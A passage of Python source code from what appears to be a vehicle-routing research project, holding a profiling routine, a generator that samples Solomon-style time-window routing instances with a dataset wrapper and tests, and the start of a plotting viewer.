part = MAX_CON
idx = (-np.array([len(t) for t in s])).argsort(axis=-1)
part_idx = idx[:part]
comp_idx = idx[part:]
new_sol = []
for idx in part_idx:
t = s[idx]
tlim = rnd.choice(np.arange(2, max(len(t)-1, 3)))
assert tlim >= 2
new_sol.append(t[:tlim])
#new_sol += [[el] for el in t[tlim:]]
for idx in comp_idx:
new_sol.append([0] + s[idx] + [0]) # add depot idx at start and end
new_solutions.append([new_sol[:28]]) # in list corresponding to num_samples=1
if NO_COST:
cost = None
new_solutions = [s*N_SMP for s in new_solutions]
obs = env.import_sol(new_solutions, cost)
def _profile():
from torch.utils.data import DataLoader
from lib.routing import RPDataset, GROUPS, TYPES, TW_FRACS
from torch.profiler import profile, record_function, ProfilerActivity, schedule
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
SMP = 128
N = 50
BS = 64
BS_ = BS
MAX_CON = 3
CUDA = False
SEED = 123
POMO = False
N_POMO = 8
if POMO:
BS_ = BS // N_POMO
SMP = 2*BS_
INFER = True
device = torch.device("cuda" if CUDA else "cpu")
ds = RPDataset(cfg=SAMPLE_CFG, stats_pth=LPATH)
ds.seed(SEED)
data = ds.sample(sample_size=SMP, graph_size=N)
dl = DataLoader(
data,
batch_size=BS_,
collate_fn=lambda x: x, # identity -> returning simple list of instances
shuffle=False
)
env = RPEnv(debug=True,
device=device,
max_concurrent_vehicles=MAX_CON,
k_nbh_frac=0.4,
pomo=POMO,
num_samples=N_POMO,
inference=INFER,
)
env.seed(SEED + 1)
s = schedule(
wait=0,
warmup=0,
active=N,
repeat=2
)
with profile(
activities=[ProfilerActivity.CPU] + ([ProfilerActivity.CUDA] if CUDA else []),
schedule=s,
record_shapes=False,
profile_memory=True,
with_stack=True,
) as prof:
for batch in dl:
with record_function(">>env.load()"):
env.load_data(batch)
with record_function(">>env.reset()"):
obs = env.reset()
done = False
i = 0
start_tws = env._stack_to_tensor(batch, "tw")[:, :, 1]
# print(env.coords[:, 0])
while not done:
# print(i)
# select tour randomly and then select available node with earliest TW
tr = torch.randint(MAX_CON, size=(BS,), device=device)
t_nbh = obs.nbh[torch.arange(BS), tr]
t_msk = obs.nbh_mask[torch.arange(BS), tr]
nd = torch.zeros(BS, dtype=torch.long, device=device)
for j, (nbh, msk, start_tw) in enumerate(zip(t_nbh, t_msk, start_tws)):
available_idx = nbh[~msk] # mask is True where infeasible
idx = available_idx[start_tw[available_idx].argsort(-1, descending=False)]
nd[j] = idx[0]
with record_function(">>env.step()"):
obs, rew, done, info = env.step(torch.stack((tr, nd), dim=-1))
i += 1
with record_function(">>env.export_sol()"):
sol = env.export_sol()
# report
print(prof.key_averages(group_by_stack_n=7).table(
sort_by="gpu_time_total" if CUDA else "cpu_time_total",
row_limit=100))
```
#### File: lib/routing/generator.py
```python
import os
import sys
from typing import Union, Optional, Tuple, List, Dict
import math
import re
from warnings import warn
import itertools as it
import pickle
import logging
import numpy as np
import scipy.stats as stats
from scipy.linalg import block_diag
import torch
from torch.utils.data import Dataset
from lib.routing.formats import RPInstance
from lib.utils.challenge_utils import dimacs_challenge_dist_fn_np
__all__ = [
"RPGenerator", "RPDataset",
'GROUPS', 'TYPES', 'TW_FRACS',
]
logger = logging.getLogger(__name__)
# Solomon instance naming components
GROUPS = ["r", "c", "rc"]
TYPES = ["1", "2"]
TW_FRACS = [0.25, 0.5, 0.75, 1.0]
MAX_TRY = 100
def format_ds_save_path(directory, args=None, affix=None, fname=''):
"""Format the path for saving datasets"""
directory = os.path.normpath(os.path.expanduser(directory))
if args is not None:
for k, v in args.items():
if isinstance(v, str):
fname += f'_{v}'
else:
fname += f'_{k}_{v}'
if affix is not None:
fname = str(affix) + fname
if fname != '':
fpath = os.path.join(directory, fname)
else:
fpath = directory
if fpath[-3:] not in ['.pt', 'dat', 'pkl']:
fpath += '.pt'
if os.path.isfile(fpath):
print('Dataset file with same name exists already. Overwrite file? (y/n)')
a = input()
if a != 'y':
print('Could not write to file. Terminating program...')
sys.exit()
return fpath
class CoordsSampler:
"""Sampler implementing different options to generate coordinates for RPs."""
def __init__(self,
n_components: int = 5,
n_dims: int = 2,
coords_sampling_dist: str = "uniform",
covariance_type: str = "diag",
mus: Optional[np.ndarray] = None,
sigmas: Optional[np.ndarray] = None,
mu_sampling_dist: str = "normal",
mu_sampling_params: Tuple = (0, 1),
sigma_sampling_dist: str = "uniform",
sigma_sampling_params: Tuple = (0.025, 0.05),
random_state: Optional[Union[int, np.random.RandomState, np.random.Generator]] = None,
verbose: bool = False,
):
"""
Args:
n_components: number of mixture components
n_dims: dimension of sampled features, e.g. 2 for Euclidean coordinates
coords_sampling_dist: type of distribution to sample coordinates, one of ["uniform"]
covariance_type: type of covariance matrix, one of ['diag', 'full']
mus: user provided mean values for mixture components
sigmas: user provided covariance values for mixture components
mu_sampling_dist: type of distribution to sample initial mus, one of ['uniform', 'normal']
mu_sampling_params: parameters for mu sampling distribution
sigma_sampling_dist: type of distribution to sample initial sigmas, one of ['uniform', 'normal']
sigma_sampling_params: parameters for sigma sampling distribution
random_state: seed integer or numpy random (state) generator
verbose: verbosity flag to print additional info and warnings
"""
self.nc = n_components
self.f = n_dims
self.coords_sampling_dist = coords_sampling_dist.lower()
self.covariance_type = covariance_type
self.mu_sampling_dist = mu_sampling_dist.lower()
self.mu_sampling_params = mu_sampling_params
self.sigma_sampling_dist = sigma_sampling_dist.lower()
self.sigma_sampling_params = sigma_sampling_params
self.verbose = verbose
# set random generator
if random_state is None or isinstance(random_state, int):
self.rnd = np.random.default_rng(random_state)
else:
self.rnd = random_state
if self.coords_sampling_dist in ["gm", "gaussian_mixture", "unf+gm"]:
# sample initial mu and sigma if not provided
if mus is not None:
assert (
(mus.shape[0] == self.nc and mus.shape[1] == self.f) or
(mus.shape[0] == self.nc * self.f)
)
self.mu = mus.reshape(self.nc * self.f)
else:
self.mu = self._sample_mu(mu_sampling_dist.lower(), mu_sampling_params)
if sigmas is not None:
assert (
(sigmas.shape[0] == self.nc and sigmas.shape[1] == (self.f if covariance_type == "diag" else self.f**2))
or (sigmas.shape[0] == (self.nc * self.f if covariance_type == "diag" else self.nc * self.f**2))
)
self.sigma = self._create_cov(sigmas, cov_type=covariance_type)
else:
covariance_type = covariance_type.lower()
if covariance_type not in ["diag", "full"]:
raise ValueError(f"unknown covariance type: <{covariance_type}>")
self.sigma = self._sample_sigma(sigma_sampling_dist.lower(), sigma_sampling_params, covariance_type)
def seed(self, seed: Optional[int] = None):
if seed is not None:
self.rnd = np.random.default_rng(seed)
def resample_gm(self):
"""Resample initial mus and sigmas."""
self.mu = self._sample_mu(
self.mu_sampling_dist,
self.mu_sampling_params
)
self.sigma = self._sample_sigma(
self.sigma_sampling_dist,
self.sigma_sampling_params,
self.covariance_type
)
def sample(self,
n: int,
resample_mixture_components: bool = True,
**kwargs) -> np.ndarray:
"""
Args:
n: number of samples to draw
resample_mixture_components: flag to resample mu and sigma of all mixture components for each instance
Returns:
coords: (n, n_dims)
"""
# sample depot from a inner circle
#depot = self._sample_unf_coords(1, **kwargs)
depot = self._sample_ring(size=1, radius_range=(0, 0.13))
depot = (depot + 1)/2 # normalize
depot = np.maximum(np.minimum(depot, 0.7), 0.3)
if self.coords_sampling_dist == "uniform":
coords = self._sample_unf_coords(n, **kwargs)
else:
if resample_mixture_components:
self.resample_gm()
if self.coords_sampling_dist == "unf+gm":
n_unf = n//2
n_gm = n-n_unf
unf_coords = self._sample_unf_coords(n_unf, **kwargs)
n_per_c = math.ceil(n_gm / self.nc)
self.mu = self._sample_mu(dist="ring", params=(0.9, 1.2))
gm_coords = self._sample_gm_coords(n_per_c, n_gm, **kwargs)
coords = np.vstack((unf_coords, gm_coords))
else:
n_per_c = math.ceil(n / self.nc)
coords = self._sample_gm_coords(n_per_c, n, **kwargs)
return np.vstack((depot, coords)).astype(np.float32)
def _sample_mu(self, dist: str, params: Tuple):
size = self.nc * self.f
if dist == "uniform":
return self._sample_uniform(size, params[0], params[1])
elif dist == "normal":
return self._sample_normal(size, params[0], params[1])
elif dist == "ring":
return self._sample_ring(self.nc, params).reshape(-1)
elif dist == "io_ring":
return self._sample_io_ring(self.nc).reshape(-1)
else:
raise ValueError(f"unknown sampling distribution: <{dist}>")
def _sample_sigma(self, dist: str, params: Tuple, cov_type: str):
if cov_type == "full":
size = self.nc * self.f**2
else:
size = self.nc * self.f
if dist == "uniform":
x = self._sample_uniform(size, params[0], params[1])
elif dist == "normal":
x = np.abs(self._sample_normal(size, params[0], params[1]))
else:
raise ValueError(f"unknown sampling distribution: <{dist}>")
return self._create_cov(x, cov_type=cov_type)
def _create_cov(self, x, cov_type: str):
if cov_type == "full":
# create block diagonal matrix to model covariance only
# between features of each individual component
x = x.reshape((self.nc, self.f, self.f))
return block_diag(*x.tolist())
else:
return np.diag(x.reshape(-1))
def _sample_uniform(self,
size: Union[int, Tuple[int, ...]],
low: Union[int, np.ndarray] = 0.0,
high: Union[int, np.ndarray] = 1.0):
return self.rnd.uniform(size=size, low=low, high=high)
def _sample_normal(self,
size: Union[int, Tuple[int, ...]],
mu: Union[int, np.ndarray],
sigma: Union[int, np.ndarray]):
return self.rnd.normal(size=size, loc=mu, scale=sigma)
def _sample_ring(self, size: int, radius_range: Tuple = (0, 1)):
"""inspired by https://stackoverflow.com/a/41912238"""
#eps = self.rnd.standard_normal(1)[0]
if size == 1:
angle = self.rnd.uniform(0, 2*np.pi, size)
#eps = self.rnd.uniform(0, np.pi, size)
else:
angle = np.linspace(0, 2*np.pi, size)
#angle = np.linspace(0+eps, 2*np.pi+eps, size)
#angle = rnd.uniform(0, 2*np.pi, size)
#angle += self.rnd.standard_normal(size)*0.05
angle += self.rnd.uniform(0, np.pi/3, size)
d = np.sqrt(self.rnd.uniform(*radius_range, size))
#d = np.sqrt(rnd.normal(np.mean(radius_range), (radius_range[1]-radius_range[0])/2, size))
return np.concatenate((
(d*np.cos(angle))[:, None],
(d*np.sin(angle))[:, None]
), axis=-1)
def _sample_io_ring(self, size: int):
"""sample an inner and outer ring."""
# have approx double the number of points in outer ring than inner ring
num_inner = size//3
num_outer = size-num_inner
inner = self._sample_ring(num_inner, (0.01, 0.2))
outer = self._sample_ring(num_outer, (0.21, 0.5))
return np.vstack((inner, outer))
def _sample_unf_coords(self, n: int, **kwargs) -> np.ndarray:
"""Sample coords uniform in [0, 1]."""
return self.rnd.uniform(size=(n, self.f))
def _sample_gm_coords(self, n_per_c: int, n: Optional[int] = None, **kwargs) -> np.ndarray:
"""Sample coordinates from k Gaussians."""
coords = self.rnd.multivariate_normal(
mean=self.mu,
cov=self.sigma,
size=n_per_c,
).reshape(-1, self.f) # (k*n, f)
if n is not None:
coords = coords[:n] # if k % n != 0, some of the components have 1 more sample than others
# normalize coords in [0, 1]
return self._normalize_coords(coords)
@staticmethod
def _normalize_coords(coords: np.ndarray):
"""Applies joint min-max normalization to x and y coordinates."""
coords[:, 0] = coords[:, 0] - coords[:, 0].min()
coords[:, 1] = coords[:, 1] - coords[:, 1].min()
max_val = coords.max() # joint max to preserve relative spatial distances
coords[:, 0] = coords[:, 0] / max_val
coords[:, 1] = coords[:, 1] / max_val
return coords
class InstanceSampler:
"""Sampler class for samplers based on Solomon benchmark data statistics."""
def __init__(self, cfg: Dict, seed: int = 1):
# set key-value pairs from Solomon instance stats
# as InstanceSampler instance attributes
for k, v in cfg.items():
setattr(self, k, v)
# initialize random generator
self.rnd = np.random.default_rng(seed)
# set group id (remove instance number from id str)
self.group_id = re.sub(r'\d+', '', self.id).upper()
# coords sampler (depends on group id)
if self.group_id == "R":
self.coords_sampler = CoordsSampler(
coords_sampling_dist="uniform",
random_state=seed+1
)
elif self.group_id == "C":
self.coords_sampler = CoordsSampler(
n_components=self.n_components,
coords_sampling_dist="gm",
mu_sampling_dist="io_ring",
sigma_sampling_params=(0., 0.005),
random_state=seed+1
)
elif self.group_id == "RC":
self.coords_sampler = CoordsSampler(
n_components=self.n_components,
coords_sampling_dist="unf+gm",
mu_sampling_dist="ring",
sigma_sampling_params=(0.01, 0.01),
random_state=seed+1
)
else:
raise ValueError(f"unknown group_id: {self.group_id} (from {self.id}).")
# demand sampler
### e.g.
#'demand': {'dist': 'poisson', 'params': ([0.81], {0: 10.0, 1: 20.0, 2: 30.0, 3: 40.0, 4: 50.0})}
p, p_misc = self.demand['params'] # tuple: (dist params, additional miscellaneous params)
self.demand_p_misc = p_misc
if self.demand['dist'] == "poisson":
self.demand_sampler = stats.poisson(*p)
elif self.demand['dist'] == "gamma":
self.demand_sampler = stats.gamma(*p)
else:
raise ValueError(f"unknown demand_sampler cfg: {self.demand}.")
# TW start sampler
### e.g.
# 'tw_start': {'dist': 'KDE', 'params': <scipy.stats.kde.gaussian_kde object at 0x7ff5fe8c72e0>,
# 'tw_start': {'dist': 'normal', 'params': (0.34984000000000004, 0.23766332152858588)}
if self.tw_start['dist'] == "gamma":
self.tw_start_sampler = stats.gamma(*self.tw_start['params'])
elif self.tw_start['dist'] == "normal":
self.tw_start_sampler = stats.norm(*self.tw_start['params'])
elif self.tw_start['dist'] == "KDE":
self.tw_start_sampler = self.tw_start['params'] # assigns fitted KDE model
else:
raise ValueError(f"unknown tw_start_sampler cfg: {self.tw_start}.")
# TW len sampler
if self.tw_len['dist'] == "const":
self.tw_len_sampler = self.tw_len['params'] # this is the normalized len, there is also self.org_tw_len
elif self.tw_len['dist'] == "gamma":
self.tw_len_sampler = stats.gamma(*self.tw_len['params'])
elif self.tw_len['dist'] == "normal":
self.tw_len_sampler = stats.norm(*self.tw_len['params'])
elif self.tw_len['dist'] == "KDE":
self.tw_len_sampler = self.tw_len['params'] # assigns fitted KDE model
else:
raise ValueError(f"unknown tw_len_sampler cfg: {self.tw_len}.")
# service time in Solomon data is constant for each instance, so mean == exact value
self.service_time = self.norm_summary.loc['mean', 'service_time']
def seed(self, seed: Optional[int] = None):
if seed is not None:
self.rnd = np.random.default_rng(seed)
self.coords_sampler.seed(seed+1)
def sample(self, size: int, **kwargs) -> RPInstance:
i = 0
feasible = False
while not feasible:
if i > MAX_TRY:
raise RuntimeError(f"Encountered many infeasible instances during sampling. "
f"Try to adapt sampling parameters.")
try:
coords = self._sample_coords(size)
# Euclidean distance
dist_to_depot = dimacs_challenge_dist_fn_np(coords[1:], coords[0])
time_to_depot = dist_to_depot / self.org_service_horizon
demand = self._sample_demand(size)
tw_start, tw_mask, num_tws = self._sample_tw_start(size, time_to_depot)
tw = self._sample_tw_end(
size=size,
tw_start=tw_start,
time_to_depot=time_to_depot,
tw_mask=tw_mask,
num_tws=num_tws,
)
except AssertionError as ae:
logger.debug(f"error while sampling. retrying... \n {ae}")
i += 1
continue
feasible = True
assert not np.any((tw[1:, 1] + time_to_depot + self.service_time) > 1.0)
return RPInstance(
coords=coords,
demands=demand,
tw=tw,
service_time=self.service_time,
graph_size=size+1,
org_service_horizon=self.org_service_horizon,
max_vehicle_number=25,
vehicle_capacity=1.0, # is normalized
service_horizon=1.0, # is normalized
depot_idx=[0],
)
def _sample_coords(self, size: int):
# simple case, all logic is already in coords sampler
return self.coords_sampler.sample(n=size)
def _sample_demand(self, size: int) -> np.ndarray:
"""sample demand according to cfg specifications."""
# POISSON
if self.demand['dist'] == "poisson":
# sample from poisson dist
smp = self.demand_sampler.rvs(size=size, random_state=self.rnd)
mode = int(list(self.demand_p_misc.values())[0])
keys = list(self.demand_p_misc.keys())
smp = np.array([self.demand_p_misc[e] if e in keys else mode for e in smp])
# GAMMA
elif self.demand['dist'] == "gamma":
# sample from gamma dist
smp = self.demand_sampler.rvs(size=size, random_state=self.rnd)
# round to bins
unq, x_lim = self.demand_p_misc
max_diff = np.max(unq[1:]-unq[:-1])
if max_diff < 1 + np.finfo(float).eps:
smp = np.round(smp) # integer range bins
else:
bin_centers = np.array([(l+u)/2 for l, u in zip(unq[:-1], unq[1:])])
smp = np.digitize(smp, bin_centers)
smp = unq[smp]
# truncate if sample value is larger than half a std
# from the max observed in the training data (value saved in 'x_lim')
# and set to median value
m = self.demand_sampler.median()
smp[smp > x_lim] = m
else:
raise RuntimeError
# normalize demands
smp /= self.vehicle_capacity
# simple check of totals
assert smp.sum() < 25, f"total sum of demands larger than total fleet capacity!"
# add depot demand of 0
return np.concatenate((np.zeros(1), smp), axis=0)
def _sample_tw_start(self, size: int, time_to_depot: float
) -> Tuple[np.ndarray, np.ndarray, int]:
"""sample start time of TW according to cfg specifications."""
# get fraction of TW
if self.tw_frac < 1.0:
num_tws = int(np.ceil(size*self.tw_frac))
tw_mask = np.zeros(size, dtype=np.bool)
tw_mask[self.rnd.choice(np.arange(size), size=num_tws, replace=False)] = 1
else:
num_tws = size
tw_mask = np.ones(size, dtype=np.bool)
# rejection sampling
mean_tw_len = self.norm_summary.loc['mean', 'tw_len']
eps = 1./self.org_service_horizon
m = 10
infeasible = True
n = num_tws
out = np.empty_like(time_to_depot)
smp_idx = tw_mask.nonzero()[0]
while infeasible:
max_tw_start = 1. - np.repeat(time_to_depot[smp_idx] + self.service_time, m, axis=-1) - mean_tw_len/2
assert np.all(max_tw_start > 0)
if self.tw_start['dist'] == "gamma":
smp = self.tw_start_sampler.rvs(size=m*n, random_state=self.rnd)
elif self.tw_start['dist'] == "normal":
smp = self.tw_start_sampler.rvs(size=m*n, random_state=self.rnd)
elif self.tw_start['dist'] == "KDE":
smp = self.tw_start_sampler.resample(size=m*n, seed=self.rnd)
else:
raise RuntimeError
smp = smp.reshape(-1, m) + eps
feasible = (smp > 0.0) & (smp <= max_tw_start.reshape(-1, m))
has_feasible_val = np.any(feasible, axis=-1)
# argmax returns idx of first True value if there is any, otherwise 0.
first_feasible_idx = feasible[has_feasible_val].argmax(axis=-1)
out[smp_idx[has_feasible_val]] = smp[has_feasible_val, first_feasible_idx]
if np.all(has_feasible_val):
infeasible = False
else:
no_feasible_val = ~has_feasible_val
smp_idx = smp_idx[no_feasible_val]
n = no_feasible_val.sum()
m *= 2
if m >= 320: # 5
# fall back to uniform sampling from valid interval
s = eps
e = max_tw_start
out[smp_idx] = self.rnd.uniform(s, e, size=n)
infeasible = False
# set tw_start to 0 for nodes without TW
out[~tw_mask] = 0
return out, tw_mask, num_tws
def _sample_tw_end(self,
size: int,
tw_start: np.ndarray,
time_to_depot: float,
tw_mask: np.ndarray,
num_tws: int,
) -> np.ndarray:
"""sample end time of TW according to cfg specifications."""
# make sure sampled end is feasible by checking if
# service time + time to return to depot is smaller than total service horizon
eps = 1./self.org_service_horizon
t_delta = time_to_depot[tw_mask]
inc_time = t_delta + self.service_time + eps
smp_idx = tw_mask.nonzero()[0]
out = np.empty_like(time_to_depot)
if self.tw_len['dist'] == "const":
assert np.all(inc_time + t_delta + self.tw_len_sampler < 1.0), \
f"infeasible coordinates encountered"
smp = self.tw_len_sampler # all same constant value
return_time = tw_start[tw_mask] + smp + inc_time
infeasible = return_time >= 1.0
if np.any(infeasible):
inf_idx = smp_idx[infeasible]
tw_start[inf_idx] = tw_start[inf_idx] - (return_time[infeasible] - 1 + eps)
assert np.all(tw_start >= 0)
out[tw_mask] = np.maximum(tw_start[tw_mask] + smp, t_delta + eps)
else:
# rejection sampling
assert np.all(inc_time + t_delta < 1.0)
m = 10
infeasible = True
n = num_tws
while infeasible:
if self.tw_len['dist'] == "gamma":
smp = self.tw_len_sampler.rvs(size=m*n, random_state=self.rnd)
elif self.tw_len['dist'] == "normal":
smp = self.tw_len_sampler.rvs(size=m*n, random_state=self.rnd)
elif self.tw_len['dist'] == "KDE":
smp = self.tw_len_sampler.resample(size=m*n, seed=self.rnd)
else:
raise RuntimeError
smp = smp.reshape(-1, m)
# check feasibility
# tw should be between tw_start + earliest possible arrival time from depot and
# end of service horizon - time required to return to depot
_tws = np.repeat(tw_start[smp_idx], m, axis=-1).reshape(-1, m)
feasible = (
(_tws + np.repeat(t_delta, m, axis=-1).reshape(-1, m) < smp)
&
(_tws + np.repeat(inc_time, m, axis=-1).reshape(-1, m) + smp < 1.0)
)
has_feasible_val = np.any(feasible, axis=-1)
# argmax returns idx of first True value if there is any, otherwise 0.
first_feasible_idx = feasible[has_feasible_val].argmax(axis=-1)
out[smp_idx[has_feasible_val]] = smp[has_feasible_val, first_feasible_idx]
if np.all(has_feasible_val):
infeasible = False
else:
no_feasible_val = ~has_feasible_val
smp_idx = smp_idx[no_feasible_val]
n = no_feasible_val.sum()
t_delta = t_delta[no_feasible_val]
inc_time = inc_time[no_feasible_val]
m *= 2
if m >= 320: # 5
# fall back to uniform sampling from valid interval
_tws = tw_start[smp_idx]
s = np.maximum(_tws, t_delta) + eps
e = 1. - inc_time
out[smp_idx] = self.rnd.uniform(s, e)
infeasible = False
# add TW end as latest possible arrival time for all nodes without TW constraint
out[~tw_mask] = 1.0 - time_to_depot[~tw_mask] - self.service_time - eps
#assert np.all(out + time_to_depot + self.service_time < 1.0)
return np.concatenate((
np.array([[0, 1]]), # add depot tw start 0 and end 1
np.concatenate((tw_start[:, None], out[:, None]), axis=-1)
), axis=0)
class RPGenerator:
"""Generator unifying sampling procedure."""
def __init__(self,
sample_cfg: Dict,
stats_file_path: str,
seed: int = 1,
):
self.sample_cfg = sample_cfg
self.rnd = np.random.default_rng(seed)
# load stats pkl
with open(stats_file_path, 'rb') as f:
stats_cfg = pickle.load(f)
# get specified cfgs
cfgs = []
for grp in sample_cfg['groups']:
for typ in sample_cfg['types']:
for twf in sample_cfg['tw_fracs']:
cfgs.append(stats_cfg[grp][f"{grp}{typ}"][f"tw_frac={twf}"])
self.cfgs = list(it.chain.from_iterable(cfgs))
# initialize corresponding samplers
self.num_samplers = len(self.cfgs)
self.samplers = []
for cfg in self.cfgs:
self.samplers.append(InstanceSampler(cfg))
def seed(self, seed: Optional[int] = None):
"""Set generator seed."""
self.rnd = np.random.default_rng(seed)
for i in range(self.num_samplers):
self.samplers[i].seed(seed + i + 1)
def generate(self, sample_size: int = 1000, graph_size: int = 100, **kwargs):
"""Generate data with corresponding RP generator function."""
# sample from each instance sampler and take care of truncation if
# sample_size % self.num_samplers != 0
n_per_sampler = math.ceil(sample_size / self.num_samplers)
num_trunc = self.num_samplers * n_per_sampler - sample_size
assert self.num_samplers * n_per_sampler - num_trunc == sample_size
smp = []
for i in range(self.num_samplers):
smp += self._sample(i, n_per_sampler-1 if i < num_trunc else n_per_sampler, graph_size)
return smp
def _sample(self, i: int, sample_size: int, graph_size: int = 100):
sampler = self.samplers[i]
return [sampler.sample(size=graph_size) for _ in range(sample_size)]
@staticmethod
def load_dataset(cfg: Dict,
filename: Optional[str] = None,
offset: int = 0,
limit: Optional[int] = None,
**kwargs):
"""Load data from file."""
f_ext = os.path.splitext(filename)[1]
assert f_ext in ['.pkl', '.dat', '.pt']
filepath = os.path.normpath(os.path.expanduser(filename))
logger.info(f"Loading dataset from: {filepath}")
try:
data = torch.load(filepath, **kwargs)
except RuntimeError:
# fall back to pickle loading
assert os.path.splitext(filepath)[1] == '.pkl', "Can only load pickled datasets."
with open(filepath, 'rb') as f:
data = pickle.load(f, **kwargs)
# select instances specified in cfg
instances = []
for grp in cfg['groups']:
for typ in cfg['types']:
for twf in cfg['tw_fracs']:
instances.append(data[f"{grp}{typ}"][f"tw_frac={twf}"])
data = list(it.chain.from_iterable(instances))
if limit is not None and len(data) != (limit-offset):
assert isinstance(data, List) or isinstance(data, np.ndarray), \
f"To apply limit the data has to be of type <List> or <np.ndarray>."
if len(data) < limit:
warn(f"Provided data size limit={limit} but limit is larger than data size={len(data)}.")
logger.info(f"Specified offset={offset} and limit={limit}. "
f"Loading reduced dataset of size={limit-offset}.")
return data[offset:limit]
else:
return data
@staticmethod
def save_dataset(dataset: Union[List, np.ndarray],
filepath: str,
**kwargs):
"""Saves data set to file path"""
filepath = format_ds_save_path(filepath, **kwargs)
# create directory if it doesn't exist
os.makedirs(os.path.dirname(filepath), exist_ok=True)
logger.info(f"Saving dataset to: {filepath}")
try:
torch.save(dataset, filepath)
except RuntimeError:
# fall back to pickle save
assert os.path.splitext(filepath)[1] == '.pkl', "Can only save as pickle. Please add extension '.pkl'!"
with open(filepath, 'wb') as f:
pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)
return str(filepath)
class RPDataset(Dataset):
"""Routing problem dataset wrapper."""
def __init__(self,
cfg: Dict,
data_pth: str = None,
stats_pth: str = None,
seed: int = None,
**kwargs):
"""
Args:
cfg: config of solomon stats to use for sampling
data_pth: file path to load dataset
stats_pth: file path to load solomon stats
seed: seed for random generator
**kwargs: additional kwargs for the generator
"""
super(RPDataset, self).__init__()
self.cfg = cfg
self.data_pth = data_pth
self.gen = None
if data_pth is not None:
logger.info(f"provided dataset {data_pth}, so no new samples are generated.")
elif stats_pth is not None:
self.gen = RPGenerator(sample_cfg=cfg, stats_file_path=stats_pth, seed=seed)
else:
RuntimeError(f"Need to specify either 'data_pth' or 'sample_cfg'.")
self.size = None
self.data = None
def seed(self, seed: int):
if self.gen is not None:
self.gen.seed(seed)
def load_ds(self, limit: Optional[int] = None, **kwargs):
"""Simply load dataset from data_path specified on init."""
assert self.data_pth is not None
self.data = RPGenerator.load_dataset(filename=self.data_pth,
limit=limit,
cfg=self.cfg,
**kwargs)
self.size = len(self.data)
def sample(self, sample_size: int = 10000, graph_size: int = 100, **kwargs):
"""Loads fixed dataset if filename was provided else
samples a new dataset based on specified config."""
if self.data_pth is not None: # load data
self.data = RPGenerator.load_dataset(filename=self.data_pth,
limit=sample_size,
cfg=self.cfg,
**kwargs)
else:
self.data = self.gen.generate(
sample_size=sample_size,
graph_size=graph_size,
**kwargs
)
self.size = len(self.data)
return self
def __len__(self):
return self.size
def __getitem__(self, idx):
return self.data[idx]
# ============= #
# ### TEST #### #
# ============= #
def _test1():
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
with open(LPATH, 'rb') as f:
dset_cfg = pickle.load(f)
cfgs = []
for grp in SAMPLE_CFG['groups']:
for typ in SAMPLE_CFG['types']:
for twf in SAMPLE_CFG['tw_fracs']:
cfgs.append(dset_cfg[grp][f"{grp}{typ}"][f"tw_frac={twf}"])
cfgs = list(it.chain.from_iterable(cfgs))
for cfg in cfgs:
sampler = InstanceSampler(cfg)
sampler.seed(123)
for _ in range(100):
sampler.sample(100)
return True
def _test2():
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
BS = 512
N = 100
gen = RPGenerator(sample_cfg=SAMPLE_CFG, stats_file_path=LPATH)
gen.seed(123)
data = gen.generate(BS, N)
# for d in data:
# print(d.coords[0])
assert len(data) == BS
return True
def _test3():
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
BS = 512
N = 100
ds = RPDataset(cfg=SAMPLE_CFG, stats_pth=LPATH)
ds.seed(123)
data = ds.sample(sample_size=BS, graph_size=N)
assert len(data) == BS
return True
```
#### File: lib/routing/visualization.py
```python
import os
import logging
from typing import Optional, Dict
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.animation import ImageMagickWriter
import torch
# configure matplotlib logger
logging.getLogger("matplotlib").setLevel(logging.WARNING)
if "PYCHARM_HOSTED" in os.environ:
matplotlib.use("TKAgg") # for use with GUI/IDE
class Viewer:
"""Renders routing environment by plotting changes of routing edges for each step."""
def __init__(self,
locs: np.ndarray,
save_dir: Optional[str] = None,
as_gif: bool = True,
gif_naming: Optional[str] = None,
**kwargs):
self.locs = locs
self.save_dir = os.path.join(save_dir, "gifs") if save_dir is not None else None
self.as_gif = as_gif
if self.as_gif:
matplotlib.use("Agg") # for saving stream to file
self.edges = None
self.writer = None
self.cmap = plt.get_cmap("tab20")
plt.ion()
# scale arrow sizes by plot scale, indicated by max distance from center
max_dist_from_zero = np.max(np.abs(locs))
self.hw = max_dist_from_zero * 0.02
self.hl = self.hw * 1.25
# create figure objects
self.fig, self.ax = plt.subplots()
self.plot_locs(self.locs, **kwargs)
if save_dir is not None:
os.makedirs(self.save_dir, exist_ok=True)
if not self.as_gif:
plt.show(block=False)
else:
assert save_dir is not None, f"Must specify save_dir to create gif."
metadata = dict(title='routing_env_render', artist='Matplotlib', comment='matplotlib2gif')
self.writer = ImageMagickWriter(fps=2, metadata=metadata)
if gif_naming is None:
gif_naming = f"render.gif"
if gif_naming[-4:] != ".gif":
gif_naming += ".gif"
outfile = os.path.join(self.save_dir, gif_naming)
self.writer.setup(fig=self.fig, outfile=outfile)
def plot_locs(self, locs: np.ndarray, add_idx: bool = True, **kwargs):
# scatter plot of locations
self.ax.scatter(locs[:, 0], locs[:, 1], c='k')
self.ax.scatter(locs[0, 0], locs[0, 1], c='r', s=7 ** 2, marker='s') # depot/start node
if add_idx:
# add node indices
for i in range(1, locs.shape[0]):
self.ax.annotate(i, (locs[i, 0], locs[i, 1]),
xytext=(locs[i, 0]+0.012, locs[i, 1]+0.012),
fontsize='medium', fontweight='roman')
def update(self,
buffer: Dict,
cost: float,
n_iters: Optional[int] = None,
pause_sec: float = 0.5,
new_locs: Optional[np.ndarray] = None,
**kwargs):
"""Update current dynamic figure.
Args:
buffer: dictionary of data to plot
cost: cost of current solution
n_iters: current iteration
pause_sec: float specifying seconds to wait before updating figure
new_locs: optional new locations
"""
if new_locs is not None:
self.plot_locs(new_locs, **kwargs)
[p.remove() for p in self.ax.patches] # remove all previous patches
num_tours = 0
if 'edges' in buffer.keys():
edges = buffer['edges']
if isinstance(edges, np.ndarray): # TSP
edges = [edges]
num_tours = len(edges)
if num_tours > self.cmap.N:
self.cmap = plt.get_cmap('jet', len(edges))
